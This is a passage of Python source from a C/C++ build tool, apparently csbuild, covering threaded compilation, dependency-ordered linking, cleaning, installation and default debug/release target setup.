return func
#</editor-fold>
_shared_globals.starttime = time.time( )
sys.stdout = log.stdoutWriter(sys.stdout)
_building = False
class _LinkStatus(object):
"""
Defines the current link status of a project.
"""
Fail = 0
Success = 1
UpToDate = 2
def _build( ):
"""
Build the project.
This step handles:
Checking library dependencies.
Checking which files need to be built.
And spawning a build thread for each one that does.
"""
if _guiModule:
_guiModule.run()
built = False
global _building
_building = True
for project in _shared_globals.sortedProjects:
for chunk in project.chunks:
if project.activeToolchain.Compiler().SupportsDummyObjects():
objs = []
for source in chunk:
obj = _utils.GetSourceObjPath(project, source)
if not os.access(obj, os.F_OK):
objs.append(obj)
project.activeToolchain.Compiler().MakeDummyObjects(objs)
linker_threads_blocked = _shared_globals.max_linker_threads - 1
for i in range( linker_threads_blocked ):
_shared_globals.link_semaphore.acquire(True)
for project in _shared_globals.sortedProjects:
_shared_globals.total_compiles += len( project._finalChunkSet )
_shared_globals.total_compiles += _shared_globals.total_precompiles
_shared_globals.current_compile = 1
projects_in_flight = set()
projects_done = set()
pending_links = set()
pending_builds = _shared_globals.sortedProjects
#projects_needing_links = set()
for project in pending_builds:
for plugin in project.plugins:
_utils.CheckRunBuildStep(project, plugin.preMakeStep, "plugin pre-make")
_shared_globals.globalPreMakeSteps.add(plugin.globalPreMakeStep)
_utils.CheckRunBuildStep(project, project.activeToolchain.preMakeStep, "toolchain pre-make")
_shared_globals.globalPreMakeSteps |= project.activeToolchain.GetGlobalPreMakeSteps()
for buildStep in project.preMakeSteps:
_utils.CheckRunBuildStep(project, buildStep, "project pre-make")
for buildStep in _shared_globals.globalPreMakeSteps:
if _utils.FuncIsEmpty(buildStep):
continue
log.LOG_BUILD( "Running global pre-make step {}".format(_utils.GetFuncName(buildStep)))
buildStep()
_shared_globals.starttime = time.time( )
_linkThread.start()
def ReconcilePostBuild():
LinkedSomething = True
while LinkedSomething:
LinkedSomething = False
for otherProj in list( projects_in_flight ):
with otherProj.mutex:
complete = otherProj.compilationCompleted
if complete >= len( otherProj._finalChunkSet ) + int(
otherProj.needsPrecompileC ) + int(
otherProj.needsPrecompileCpp ):
totaltime = (time.time( ) - otherProj.starttime)
minutes = math.floor( totaltime / 60 )
seconds = math.floor( totaltime % 60 )
log.LOG_BUILD(
"Compile of {0} ({3} {4}) took {1}:{2:02}".format( otherProj.outputName, int( minutes ),
int( seconds ), otherProj.targetName, otherProj.outputArchitecture ) )
otherProj.buildEnd = time.time()
projects_in_flight.remove( otherProj )
if otherProj.compilationFailed:
log.LOG_ERROR( "Build of {} ({} {}/{}) failed! Finishing up non-dependent build tasks...".format(
otherProj.outputName, otherProj.targetName, otherProj.outputArchitecture, otherProj.activeToolchainName ) )
otherProj.state = _shared_globals.ProjectState.FAILED
otherProj.linkQueueStart = time.time()
otherProj.linkStart = otherProj.linkQueueStart
otherProj.endTime = otherProj.linkQueueStart
continue
okToLink = True
if otherProj.reconciledLinkDepends:
for depend in otherProj.reconciledLinkDepends:
if depend not in projects_done:
dependProj = _shared_globals.projects[depend]
if not dependProj.shell and not dependProj.prebuilt:
okToLink = False
break
if okToLink:
_link( otherProj )
LinkedSomething = True
projects_done.add( otherProj.key )
else:
log.LOG_LINKER(
"Linking for {} ({} {}/{}) deferred until all dependencies have finished building...".format(
otherProj.outputName, otherProj.targetName, otherProj.outputArchitecture, otherProj.activeToolchainName ) )
otherProj.state = _shared_globals.ProjectState.WAITING_FOR_LINK
pending_links.add( otherProj )
for otherProj in list( pending_links ):
okToLink = True
for depend in otherProj.reconciledLinkDepends:
if depend not in projects_done:
dependProj = _shared_globals.projects[depend]
if not dependProj.shell and not dependProj.prebuilt:
okToLink = False
break
if okToLink:
_link( otherProj )
LinkedSomething = True
projects_done.add( otherProj.key )
pending_links.remove( otherProj )
while pending_builds:
theseBuilds = pending_builds
pending_builds = []
for project in theseBuilds:
for depend in project.srcDepends:
if depend not in projects_done:
pending_builds.append( project )
continue
projects_in_flight.add( project )
projectSettings.currentProject = project
project.starttime = time.time( )
for plugin in project.plugins:
_utils.CheckRunBuildStep(project, plugin.preBuildStep, "plugin pre-build")
plugin.preBuildStep(project)
_utils.CheckRunBuildStep(project, project.activeToolchain.preBuildStep, "toolchain pre-build")
for buildStep in project.preBuildSteps:
_utils.CheckRunBuildStep(project, buildStep, "project pre-build")
log.LOG_BUILD( "Building {} ({} {}/{})".format( project.outputName, project.targetName, project.outputArchitecture, project.activeToolchainName ) )
project.state = _shared_globals.ProjectState.BUILDING
project.startTime = time.time()
if project.precompile_headers( ):
for chunk in projectSettings.currentProject._finalChunkSet:
#not set until here because _finalChunkSet may be empty.
project._builtSomething = True
chunkFileStr = ""
if chunk in project.chunksByFile:
chunkFileStr = " {}".format( [ os.path.basename(piece) for piece in project.chunksByFile[chunk] ] )
elif chunk in project.splitChunks:
chunkFileStr = " [Split from {}_{}{}]".format(
project.splitChunks[chunk],
project.targetName,
project.activeToolchain.Compiler().GetObjExt()
)
built = True
obj = _utils.GetSourceObjPath(projectSettings.currentProject, chunk, sourceIsChunkPath=projectSettings.currentProject.ContainsChunk(chunk))
if not _shared_globals.semaphore.acquire( False ):
if _shared_globals.max_threads != 1:
log.LOG_INFO( "Waiting for a build thread to become available..." )
_shared_globals.semaphore.acquire( True )
ReconcilePostBuild()
if _shared_globals.interrupted:
Exit( 2 )
if not _shared_globals.build_success and _shared_globals.stopOnError:
log.LOG_ERROR("Errors encountered during build, finishing current tasks and exiting...")
_shared_globals.semaphore.release()
break
if _shared_globals.times:
totaltime = (time.time( ) - _shared_globals.starttime)
_shared_globals.lastupdate = totaltime
minutes = math.floor( totaltime / 60 )
seconds = math.floor( totaltime % 60 )
avgtime = sum( _shared_globals.times ) / (len( _shared_globals.times ))
esttime = totaltime + ((avgtime * (
_shared_globals.total_compiles - len(
_shared_globals.times ))) / _shared_globals.max_threads)
if esttime < totaltime:
esttime = totaltime
_shared_globals.esttime = esttime
estmin = math.floor( esttime / 60 )
estsec = math.floor( esttime % 60 )
log.LOG_BUILD(
"Compiling {0}{7}... ({1}/{2}) - {3}:{4:02}/{5}:{6:02}".format( os.path.basename( obj ),
_shared_globals.current_compile, _shared_globals.total_compiles, int( minutes ),
int( seconds ), int( estmin ),
int( estsec ), chunkFileStr ) )
else:
totaltime = (time.time( ) - _shared_globals.starttime)
minutes = math.floor( totaltime / 60 )
seconds = math.floor( totaltime % 60 )
log.LOG_BUILD(
"Compiling {0}{5}... ({1}/{2}) - {3}:{4:02}".format( os.path.basename( obj ),
_shared_globals.current_compile,
_shared_globals.total_compiles, int( minutes ), int( seconds ), chunkFileStr ) )
_utils.ThreadedBuild( chunk, obj, project ).start( )
_shared_globals.current_compile += 1
else:
projects_in_flight.remove( project )
log.LOG_ERROR( "Build of {} ({} {}/{}) failed! Finishing up non-dependent build tasks...".format(
project.outputName, project.targetName, project.outputArchitecture, project.activeToolchainName ) )
with project.mutex:
for chunk in project._finalChunkSet:
project.fileStatus[os.path.normcase(chunk)] = _shared_globals.ProjectState.ABORTED
_shared_globals.total_compiles -= len(project._finalChunkSet)
project.linkQueueStart = time.time()
project.linkStart = project.linkQueueStart
project.endTime = project.linkQueueStart
project.state = _shared_globals.ProjectState.FAILED
if not _shared_globals.build_success and _shared_globals.stopOnError:
break
#Wait until all threads are finished. Simple way to do this is acquire the semaphore until it's out of
# resources.
for j in range( _shared_globals.max_threads ):
if not _shared_globals.semaphore.acquire( False ):
if _shared_globals.max_threads != 1:
if _shared_globals.times:
totaltime = (time.time( ) - _shared_globals.starttime)
_shared_globals.lastupdate = totaltime
minutes = math.floor( totaltime / 60 )
seconds = math.floor( totaltime % 60 )
avgtime = sum( _shared_globals.times ) / (len( _shared_globals.times ))
esttime = totaltime + ((avgtime * (_shared_globals.total_compiles - len(
_shared_globals.times ))) / _shared_globals.max_threads)
if esttime < totaltime:
esttime = totaltime
estmin = math.floor( esttime / 60 )
estsec = math.floor( esttime % 60 )
_shared_globals.esttime = esttime
log.LOG_THREAD(
"Waiting on {0} more build thread{1} to finish... ({2}:{3:02}/{4}:{5:02})".format(
_shared_globals.max_threads - j,
"s" if _shared_globals.max_threads - j != 1 else "", int( minutes ),
int( seconds ), int( estmin ), int( estsec ) ) )
else:
log.LOG_THREAD(
"Waiting on {0} more build thread{1} to finish...".format(
_shared_globals.max_threads - j,
"s" if _shared_globals.max_threads - j != 1 else "" ) )
ReconcilePostBuild()
_shared_globals.semaphore.acquire( True )
if linker_threads_blocked > 0:
_shared_globals.link_semaphore.release()
linker_threads_blocked -= 1
if _shared_globals.interrupted:
Exit( 2 )
#Then immediately release all the semaphores once we've reclaimed them.
#We're not using any more threads so we don't need them now.
for j in range( _shared_globals.max_threads ):
if _shared_globals.stopOnError:
projects_in_flight = set()
_shared_globals.semaphore.release( )
ReconcilePostBuild()
if projects_in_flight:
log.LOG_ERROR( "Could not complete all projects. This is probably very bad and should never happen."
" Remaining projects: {0}".format( [p.key for p in projects_in_flight] ) )
if pending_links:
log.LOG_ERROR( "Could not link all projects. Do you have unmet dependencies in your makefile?"
" Remaining projects: {0}".format( [p.key for p in pending_links] ) )
for p in pending_links:
p.state = _shared_globals.ProjectState.ABORTED
_shared_globals.build_success = False
for proj in _shared_globals.sortedProjects:
proj.save_md5s( proj.allsources, proj.allheaders )
if not built:
log.LOG_BUILD( "Nothing to build." )
_building = False
global _linkCond
global _linkMutex
with _linkMutex:
_linkCond.notify()
log.LOG_THREAD("Waiting for linker tasks to finish.")
_linkThread.join()
if not projects_in_flight and not pending_links:
for project in _shared_globals.sortedProjects:
for plugin in project.plugins:
_utils.CheckRunBuildStep(project, plugin.postMakeStep, "plugin post-make")
_shared_globals.globalPostMakeSteps.add(plugin.globalPostMakeStep)
_utils.CheckRunBuildStep(project, project.activeToolchain.postMakeStep, "toolchain post-make")
_shared_globals.globalPostMakeSteps |= project.activeToolchain.GetGlobalPostMakeSteps()
for buildStep in project.postMakeSteps:
_utils.CheckRunBuildStep(project, buildStep, "project post-make")
for buildStep in _shared_globals.globalPostMakeSteps:
if _utils.FuncIsEmpty(buildStep):
continue
log.LOG_BUILD( "Running global post-make step {}".format(_utils.GetFuncName(buildStep)))
buildStep()
compiletime = time.time( ) - _shared_globals.starttime
totalmin = math.floor( compiletime / 60 )
totalsec = math.floor( compiletime % 60 )
log.LOG_BUILD( "Compilation took {0}:{1:02}".format( int( totalmin ), int( totalsec ) ) )
_shared_globals.buildFinished = True
return _shared_globals.build_success
_linkMutex = threading.Lock()
_linkCond = threading.Condition(_linkMutex)
_linkQueue = []
_currentLinkThreads = set()
_linkThreadMutex = threading.Lock()
_recheckDeferredLinkTasks = False
def _link( project, *objs ):
"""
Linker:
Links all the built files.
Accepts an optional list of object files to link; if this list is not provided it will use the auto-generated
list created by build()
This function also checks (if nothing was built) the modified times of all the required libraries, to see if we need
to relink anyway, even though nothing was compiled.
"""
global _linkQueue
global _linkMutex
global _linkCond
project.state = _shared_globals.ProjectState.LINK_QUEUED
project.linkQueueStart = time.time()
with _linkMutex:
_linkQueue.append( (project, list(objs)) )
_linkCond.notify()
def _performLink(project, objs):
project.linkStart = time.time()
for plugin in project.plugins:
_utils.CheckRunBuildStep(project, plugin.preLinkStep, "plugin pre-link")
_utils.CheckRunBuildStep(project, project.activeToolchain.preLinkStep, "toolchain pre-link")
for buildStep in project.preLinkSteps:
_utils.CheckRunBuildStep(project, buildStep, "project pre-link")
project.ResolveFilesAndDirectories()
project.activeToolchain.SetActiveTool("linker")
starttime = time.time( )
output = os.path.join( project.outputDir, project.outputName )
log.LOG_LINKER( "Linking {0}...".format( os.path.abspath( output ) ) )
if not objs:
for chunk in project.chunks:
hasChunk = False
if not project.unity:
chunkObj = _utils.GetChunkedObjPath(project, chunk)
else:
chunkObj = _utils.GetUnityChunkObjPath(project)
if project.useChunks and not _shared_globals.disable_chunks and os.access(chunkObj , os.F_OK):
objs.append( chunkObj )
hasChunk = True
if not hasChunk or project.activeToolchain.Compiler().SupportsObjectScraping():
objsToScrape = []
if type( chunk ) == list:
for source in chunk:
obj = _utils.GetSourceObjPath(project, source)
if os.access(obj , os.F_OK):
objs.append( obj )
if source in project._finalChunkSet:
objsToScrape.append( obj )
elif not hasChunk or project.activeToolchain.Compiler().SupportsDummyObjects():
log.LOG_ERROR( "Could not find {} for linking. Something went wrong here.".format(obj) )
return _LinkStatus.Fail
else:
obj = _utils.GetSourceObjPath(project, chunk)
if os.access(obj , os.F_OK):
objs.append( obj )
if source in project._finalChunkSet:
objsToScrape.append( obj )
elif not hasChunk or project.activeToolchain.Compiler().SupportsDummyObjects():
log.LOG_ERROR( "Could not find {} for linking. Something went wrong here.".format(obj) )
return _LinkStatus.Fail
if hasChunk and objsToScrape:
project.activeToolchain.Compiler().GetObjectScraper().RemoveSharedSymbols(objsToScrape, chunkObj)
if not objs:
return _LinkStatus.UpToDate
for obj in project.extraObjs:
log.LOG_INFO("Adding extra link object {} to link queue".format(obj))
if not os.access(obj, os.F_OK):
log.LOG_ERROR("Could not find extra object {}".format(obj))
objs += project.extraObjs
if not project._builtSomething:
if os.access(output , os.F_OK):
mtime = os.path.getmtime( output )
for obj in objs:
if os.path.getmtime( obj ) > mtime:
#If the obj time is later, something got built in another run but never got linked...
#Maybe the linker failed last time.
#We should count that as having built something, because we do need to link.
#Otherwise, if the object time is earlier, there's a good chance that the existing
#output file was linked using a different target, so let's link it again to be safe.
project._builtSomething = True
break
#Even though we didn't build anything, we should verify all our libraries are up to date too.
#If they're not, we need to relink.
for i in range( len( project.libraryLocations ) ):
if os.path.getmtime(project.libraryLocations[i]) > mtime:
log.LOG_LINKER(
"Library {0} has been modified since the last successful build. Relinking to new library."
.format(
project.libraryLocations[i] ) )
project._builtSomething = True
for dep in project.reconciledLinkDepends:
depProj = _shared_globals.projects[dep]
if not depProj.prebuilt and not depProj.shell and depProj.state != _shared_globals.ProjectState.UP_TO_DATE:
log.LOG_LINKER(
"Dependent project {0} has been modified since the last successful build. Relinking to new library."
.format( depProj.name ) )
project._builtSomething = True
#Barring the two above cases, there's no point linking if the compiler did nothing.
if not project._builtSomething:
if not _shared_globals.called_something:
log.LOG_LINKER( "Nothing to link." )
return _LinkStatus.UpToDate
if not os.access(project.outputDir , os.F_OK):
os.makedirs( project.outputDir )
#On unix-based OSes, we need to remove the output file so we're not just clobbering it
#If it gets clobbered while running it could cause BAD THINGS (tm)
#On windows, however, we want to leave it there so that incremental link can work.
if platform.system() != "Windows":
if os.access(output , os.F_OK):
os.remove( output )
for dep in project.reconciledLinkDepends:
proj = _shared_globals.projects[dep]
if proj.type == ProjectType.StaticLibrary and project.linkMode == StaticLinkMode.LinkIntermediateObjects:
for chunk in proj.chunks:
hasChunk = False
if not proj.unity:
chunkObj = _utils.GetChunkedObjPath(proj, chunk)
else:
chunkObj = _utils.GetUnityChunkObjPath(proj)
if proj.useChunks and not _shared_globals.disable_chunks and os.access(chunkObj , os.F_OK):
objs.append( chunkObj )
hasChunk = True
if not hasChunk or proj.activeToolchain.Compiler().SupportsObjectScraping():
if type( chunk ) == list:
for source in chunk:
obj = _utils.GetSourceObjPath(proj, source)
if os.access(obj , os.F_OK):
objs.append( obj )
elif not hasChunk or proj.activeToolchain.Compiler().SupportsDummyObjects():
log.LOG_ERROR( "Could not find {} for linking. Something went wrong here.".format(obj) )
return _LinkStatus.Fail
else:
obj = _utils.GetSourceObjPath(proj, chunk)
if os.access(obj , os.F_OK):
objs.append( obj )
elif not hasChunk or proj.activeToolchain.Compiler().SupportsDummyObjects():
log.LOG_ERROR( "Could not find {} for linking. Something went wrong here.".format(obj) )
return _LinkStatus.Fail
objs += proj.extraObjs
cmd = project.activeToolchain.Linker().GetLinkCommand( project, output, objs )
if _shared_globals.show_commands:
print(cmd)
project.linkCommand = cmd
if platform.system() != "Windows":
cmd = shlex.split(cmd)
toolchainEnv = _utils.GetToolchainEnvironment( project.activeToolchain.Linker() )
maxNumRetries = 10
retryCount = 0
while retryCount < maxNumRetries:
try:
fd = subprocess.Popen( cmd, stdout = subprocess.PIPE, stderr = subprocess.PIPE, cwd = project.objDir, env = toolchainEnv )
except PermissionError:
# Sleep for a second before trying again.
time.sleep(1)
retryCount += 1
except:
# Other exceptions will raise normally.
raise
else:
# Successfully launched the process.
break
assert retryCount < maxNumRetries, "Failed to launch process due to PermissionError"
with _shared_globals.spmutex:
_shared_globals.subprocesses[output] = fd
(out, errors) = fd.communicate( )
with _shared_globals.spmutex:
del _shared_globals.subprocesses[output]
if _shared_globals.exiting:
return
ret = fd.returncode
sys.stdout.flush( )
sys.stderr.flush( )
if sys.version_info >= (3, 0):
out = out.decode("utf-8")
errors = errors.decode("utf-8")
out = out.replace("\r", "")
errors = errors.replace("\r", "")
sys.stdout.write( out )
sys.stderr.write( errors )
sys.stdout.flush( )
sys.stderr.flush( )
with project.mutex:
ansi_escape = re.compile(r'\x1b[^m]*m')
stripped_errors = re.sub(ansi_escape, '', errors)
project.linkOutput = out
project.linkErrors = stripped_errors
errorlist = project.activeToolchain.Compiler()._parseOutput(out)
errorlist2 = project.activeToolchain.Compiler()._parseOutput(stripped_errors)
if errorlist is None:
errorlist = errorlist2
elif errorlist2 is not None:
errorlist += errorlist2
errorcount = 0
warningcount = 0
if errorlist:
for error in errorlist:
if error.level == _shared_globals.OutputLevel.ERROR:
errorcount += 1
if error.level == _shared_globals.OutputLevel.WARNING:
warningcount += 1
project.errors += errorcount
project.warnings += warningcount
project.parsedLinkErrors = errorlist
with _shared_globals.sgmutex:
_shared_globals.warningcount += warningcount
_shared_globals.errorcount += errorcount
if ret != 0:
log.LOG_ERROR( "Linking failed." )
return _LinkStatus.Fail
totaltime = time.time( ) - starttime
totalmin = math.floor( totaltime / 60 )
totalsec = math.floor( totaltime % 60 )
log.LOG_LINKER( "Link time: {0}:{1:02}".format( int( totalmin ), int( totalsec ) ) )
return _LinkStatus.Success
class _LinkThread(threading.Thread):
def __init__(self, project, objs):
threading.Thread.__init__( self )
self._project = project
self._objs = objs
#Prevent certain versions of python from choking on dummy threads.
if not hasattr( threading.Thread, "_Thread__block" ):
threading.Thread._Thread__block = _shared_globals.dummy_block( )
def run( self ):
global _linkThreadMutex
global _currentLinkThreads
global _linkCond
global _recheckDeferredLinkTasks
try:
project = self._project
project.state = _shared_globals.ProjectState.LINKING
ret = _performLink(project, self._objs)
if ret == _LinkStatus.Fail:
_shared_globals.build_success = False
project.state = _shared_globals.ProjectState.LINK_FAILED
elif ret == _LinkStatus.Success:
for plugin in project.plugins:
_utils.CheckRunBuildStep(project, plugin.postBuildStep, "plugin post-build")
_utils.CheckRunBuildStep(project, project.activeToolchain.postBuildStep, "toolchain post-build")
for buildStep in project.postBuildSteps:
_utils.CheckRunBuildStep(project, buildStep, "project post-build")
project.state = _shared_globals.ProjectState.FINISHED
elif ret == _LinkStatus.UpToDate:
project.state = _shared_globals.ProjectState.UP_TO_DATE
project.endTime = time.time()
log.LOG_BUILD( "Finished {} ({} {}/{})".format( project.outputName, project.targetName, project.outputArchitecture, project.activeToolchainName ) )
_shared_globals.link_semaphore.release()
with _linkThreadMutex:
_currentLinkThreads.remove(project.key)
with _linkMutex:
_recheckDeferredLinkTasks = True
_linkCond.notify()
except Exception:
traceback.print_exc()
def _linkThreadLoop():
global _linkQueue
global _linkMutex
global _linkCond
global _currentLinkThreads
global _linkThreadMutex
global _recheckDeferredLinkTasks
try:
global _building
deferredLinks = []
while True:
projectsToLink = []
with _linkMutex:
if _recheckDeferredLinkTasks:
if _linkQueue:
_linkQueue += deferredLinks
else:
_linkQueue = deferredLinks
deferredLinks = []
_recheckDeferredLinkTasks = False
if not _linkQueue:
if not _building and not deferredLinks and not _currentLinkThreads:
return
_linkQueue = deferredLinks
deferredLinks = []
_linkCond.wait()
projectsToLink = _linkQueue
_linkQueue = []
for ( project, objs ) in projectsToLink:
okToLink = True
with _linkThreadMutex:
for depend in project.reconciledLinkDepends:
if depend in _currentLinkThreads:
okToLink = False
break
for ( otherProj, otherObjs ) in projectsToLink:
if otherProj.key == depend:
okToLink = False
break
if not okToLink:
break
if okToLink:
with _linkThreadMutex:
_currentLinkThreads.add(project.key)
_shared_globals.link_semaphore.acquire(True)
_LinkThread(project, objs).start()
else:
deferredLinks.append( ( project, objs ) )
except Exception:
traceback.print_exc()
_linkThread = threading.Thread(target=_linkThreadLoop)
def _clean( silent = False ):
"""
Cleans the project.
Invoked with --clean or --rebuild.
Deletes all of the object files to make sure they're rebuilt cleanly next run.
"""
for project in _shared_globals.sortedProjects:
if not silent:
log.LOG_BUILD( "Cleaning {} ({} {}/{})...".format( project.outputName, project.targetName, project.outputArchitecture, project.activeToolchainName ) )
# Delete any chunks in the current project.
for chunk in project.chunks:
if not project.unity:
obj = _utils.GetChunkedObjPath(project, chunk)
else:
obj = _utils.GetUnityChunkObjPath(project)
if os.access(obj , os.F_OK):
if not silent:
log.LOG_INFO( "Deleting {0}".format( obj ) )
os.remove( obj )
# Individual source files may not be in the chunks list, so we're gonna play it safe and delete any single source file objects that may exist.
for source in project.sources:
obj = _utils.GetSourceObjPath(project, source)
if os.access(obj , os.F_OK):
if not silent:
log.LOG_INFO( "Deleting {0}".format( obj ) )
os.remove( obj )
# Delete the project's C++ precompiled header.
headerfile = os.path.join(project.csbuildDir, "{}_cpp_precompiled_headers_{}.hpp".format(
project.outputName.split( '.' )[0],
project.targetName ) )
obj = project.activeToolchain.Compiler().GetPchFile( headerfile )
if os.access(obj , os.F_OK):
if not silent:
log.LOG_INFO( "Deleting {0}".format( obj ) )
os.remove( obj )
# Delete the project's C precompiled header.
headerfile = os.path.join(project.csbuildDir, "{}_c_precompiled_headers_{}.h".format(
project.outputName.split( '.' )[0],
project.targetName ))
obj = project.activeToolchain.Compiler().GetPchFile( headerfile )
if os.access(obj , os.F_OK):
if not silent:
log.LOG_INFO( "Deleting {0}".format( obj ) )
os.remove( obj )
# Delete the project's output directory.
outpath = os.path.join( project.outputDir, project.outputName )
if os.access(outpath , os.F_OK):
if not silent:
log.LOG_INFO( "Deleting {}".format( outpath ) )
os.remove( outpath )
def _installHeaders( ):
log.LOG_INSTALL("Installing headers...")
installed_headers = set()
for project in _shared_globals.sortedProjects:
os.chdir( project.workingDirectory )
#install headers
subdir = project.headerInstallSubdir
if not subdir:
subdir = _utils.GetBaseName( project.outputName )
if project.installHeaders:
incdir = _utils.ResolveProjectMacros(_shared_globals.install_incdir, project)
install_dir = os.path.join( incdir, subdir )
if not os.access(install_dir , os.F_OK):
os.makedirs( install_dir )
headers = []
cHeaders = []
project.get_files( headers = headers, cHeaders = cHeaders )
for header in (headers + cHeaders):
this_header_dir = os.path.dirname( os.path.join( install_dir, os.path.relpath( header, project.workingDirectory ) ) )
this_header = os.path.join( this_header_dir, header )
if this_header in installed_headers:
continue
installed_headers.add(this_header)
if not os.access(this_header_dir , os.F_OK):
os.makedirs( this_header_dir )
log.LOG_INSTALL( "Installing {0} to {1}...".format( header, this_header_dir ) )
shutil.copy( header, this_header_dir )
install_something = True
def _installOutput( ):
log.LOG_INSTALL("Installing output...")
for project in _shared_globals.sortedProjects:
os.chdir( project.workingDirectory )
output = os.path.join( project.outputDir, project.outputName )
install_something = False
if project.installOutput:
#install output file
if os.access(output , os.F_OK):
outputDir = _utils.ResolveProjectMacros(_shared_globals.install_libdir, project)
if not os.access(outputDir , os.F_OK):
os.makedirs( outputDir )
log.LOG_INSTALL( "Installing {0} to {1}...".format( output, outputDir ) )
shutil.copy( output, outputDir )
pdb = output.rsplit(".", 1)[0] + ".pdb"
if os.access(pdb , os.F_OK):
log.LOG_INSTALL( "Installing {0} to {1}...".format( pdb, outputDir ) )
shutil.copy( pdb, outputDir )
install_something = True
else:
log.LOG_ERROR( "Output file {0} does not exist! You must build without --install first.".format( output ) )
def _install( ):
"""
Installer.
Invoked with --install.
Installs the generated output file and/or header files to the specified directory.
Does nothing if neither InstallHeaders() nor InstallOutput() has been called in the make script.
"""
_installHeaders()
_installOutput()
def _make( ):
"""
Performs both the build and link steps of the process.
Aborts if the build fails.
"""
for project in _shared_globals.sortedProjects:
log.LOG_BUILD( "Verifying libraries for {} ({} {}/{})".format( project.outputName, project.targetName, project.outputArchitecture, project.activeToolchainName ) )
if not project.check_libraries( ):
Exit( 1 )
if not _build( ):
_shared_globals.build_success = False
log.LOG_ERROR( "Build failed." )
else:
log.LOG_BUILD( "Build complete." )
def AddScript( incFile ):
"""
Include the given makefile script as part of this build process.
.. attention:: The included file will be loaded in the **current** file's namespace, not a new namespace.
This doesn't work the same way as importing a module. Any functions or variables defined in the current module
will be available to the called script, and anything defined in the called script will be available to the
calling module after it's been called. As a result, this can be used much like #include in C++ to pull in
utility scripts in addition to calling makefiles. The result is essentially as if the called script were
copied and pasted directly into this one in the location of the AddScript() call.
:type incFile: str
:param incFile: path to an additional makefile script to call as part of this build
"""
path = os.path.dirname( incFile )
incFile = os.path.abspath( incFile )
wd = os.getcwd( )
os.chdir( path )
scriptFiles.append(incFile)
_execfile( incFile, _shared_globals.makefile_dict, _shared_globals.makefile_dict )
del scriptFiles[-1]
os.chdir( wd )
def SetupDebugTarget( ):
"""Default debug target."""
if not projectSettings.currentProject._optLevel_set:
SetOptimizationLevel( OptimizationLevel.Disabled )
if not projectSettings.currentProject._debugLevel_set:
SetDebugLevel( DebugLevel.EmbeddedSymbols )
Toolchain("msvc").SetDebugLevel( DebugLevel.ExternalSymbols )
if not projectSettings.currentProject.linkModeSet:
Toolchain("msvc").SetStaticLinkMode( StaticLinkMode.LinkIntermediateObjects )
AddDefines("_DEBUG")
if not projectSettings.currentProject._outputDir_set:
s = _utils.FixupRelativePath( "{project.activeToolchainName}-{project.outputArchitecture}-{project.targetName}" )
s = _utils.PathWorkingDirPair( s )
projectSettings.currentProject.outputDirTemp = s
if not projectSettings.currentProject._objDir_set:
s = _utils.FixupRelativePath( os.path.join( projectSettings.currentProject.outputDirTemp.path, "obj") )
s = _utils.PathWorkingDirPair( s )
projectSettings.currentProject.objDirTemp = s
if not projectSettings.currentProject.toolchains["msvc"].shared.debug_runtime_set:
projectSettings.currentProject.toolchains["msvc"].shared.debug_runtime = True
def SetupReleaseTarget( ):
"""Default release target."""
if not projectSettings.currentProject._optLevel_set:
SetOptimizationLevel( OptimizationLevel.Max )
if not projectSettings.currentProject._debugLevel_set:
SetDebugLevel( DebugLevel.Disabled )
Toolchain("msvc").SetDebugLevel( DebugLevel.ExternalSymbols )
AddDefines("NDEBUG")
if not projectSettings.currentProject._outputDir_set:
s = _utils.FixupRelativePath( "{project.activeToolchainName}-{project.outputArchitecture}-{project.targetName}" )
s = _utils.PathWorkingDirPair( s )
projectSettings.currentProject.outputDirTemp = s
if not projectSettings.currentProject._objDir_set:
s = _utils.FixupRelativePath( os.path.join(projectSettings.currentProject.outputDirTemp.path, "obj") )
s = _utils.PathWorkingDirPair( s )
projectSettings.currentProject.objDirTemp = s
if not projectSettings.currentProject.toolchains["msvc"].shared.debug_runtime_set:
projectSettings.currentProject.toolchains["msvc"].shared.debug_runtime = False
def _setupdefaults( ):
if platform.system() == "Darwin":
gccCompiler, gccLinker = toolchain_gcc_darwin.GccCompilerDarwin, toolchain_gcc_darwin.GccLinkerDarwin
else:
gccCompiler, gccLinker = toolchain_gcc.GccCompiler, toolchain_gcc.GccLinker
RegisterToolchain( "gcc", gccCompiler, gccLinker )
RegisterToolchain( "msvc", toolchain_msvc.MsvcCompiler, toolchain_msvc.MsvcLinker )
RegisterToolchain( "android", toolchain_android.AndroidCompiler, toolchain_android.AndroidLinker, apkBuilder = toolchain_android.APKBuilder )
RegisterToolchain( "ios", toolchain_ios.iOSCompiler, toolchain_ios.iOSLinker )
try:
# Attempt to register the PS4 toolchain.
RegisterToolchain( "ps4", toolchain_ps4.Ps4Compiler, toolchain_ps4.Ps4Linker )
RegisterToolchain( "wiiu", toolchain_wiiu.WiiUCompiler, toolchain_wiiu.WiiULinker )
except:
pass
RegisterProjectGenerator( "qtcreator", project_generator_qtcreator.project_generator_qtcreator )
RegisterProjectGenerator( "visualstudio", project_generator_visual_studio_v2.project_generator_visual_studio )
#TODO: SlickEdit project generation is disabled until we get it fixed up.
#RegisterProjectGenerator( "slickedit", project_generator_slickedit.project_generator_slickedit )
if platform.system( ) == "Windows":
SetActiveToolchain( "msvc" )
else:
SetActiveToolchain( "gcc" )
target( "debug" )( SetupDebugTarget )
target( "release" )( SetupReleaseTarget )
_guiModule = None
sysExit = sys.exit
def Done( code = 0, killGui = True ):
"""
Exit the build process early
:param code: Exit code to exit with
:type code: int
:param killGui: Whether to immediately kill the GUI or wait for the user to close it, if it's active
:type killGui: bool
"""
Exit( code, killGui )
def Exit( code = 0, killGui = True ):
"""
Exit the build process early
:param code: Exit code to exit with
:type code: int
:param killGui: Whether to immediately kill the GUI or wait for the user to close it, if it's active
:type killGui: bool
"""
_shared_globals.exiting = True
global _building
_building = False
if not imp.lock_held():
imp.acquire_lock()
with _shared_globals.spmutex:
for output, fd in _shared_globals.subprocesses.items():
log.LOG_BUILD("Killing process {} creating file '{}'".format(fd.pid, os.path.basename(output)))
try:
fd.kill()
except OSError:
pass
if os.path.exists(output):
log.LOG_BUILD("Removing incomplete/partially-created file '{}'".format(fd.pid, os.path.basename(output)))
os.remove(output)
global _guiModule
if _guiModule:
if killGui:
log.LOG_BUILD("Killing GUI")
_guiModule.stop()
_guiModule.join()
#Die hard, we don't need python to clean up and we want to make sure this exits.
#sys.exit just throws an exception that can be caught. No catching allowed.
os._exit( code )
ARG_NOT_SET = type( "ArgNotSetType", (), { } )( )
_options = []
def GetOption( option ):
"""
Retrieve the given option from the parsed command line arguments.
:type option: str
:param option: The name of the option, without any preceding dashes.
ArgParse replaces dashes with underscores, but csbuild will accept dashes and automatically handle the conversion
